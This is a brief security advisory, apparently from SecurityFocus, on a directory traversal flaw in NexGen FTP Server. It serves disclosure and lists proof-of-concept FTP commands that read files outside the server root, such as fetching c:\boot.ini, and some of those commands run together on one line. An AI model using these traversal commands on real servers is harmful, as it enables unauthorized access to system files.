NexGen FTP Server Remote Directory Traversal Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

ls c:\*.*
ls ..
ls \..ls /../
dir c:dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"


 

Privacy Statement
Copyright 2010, SecurityFocus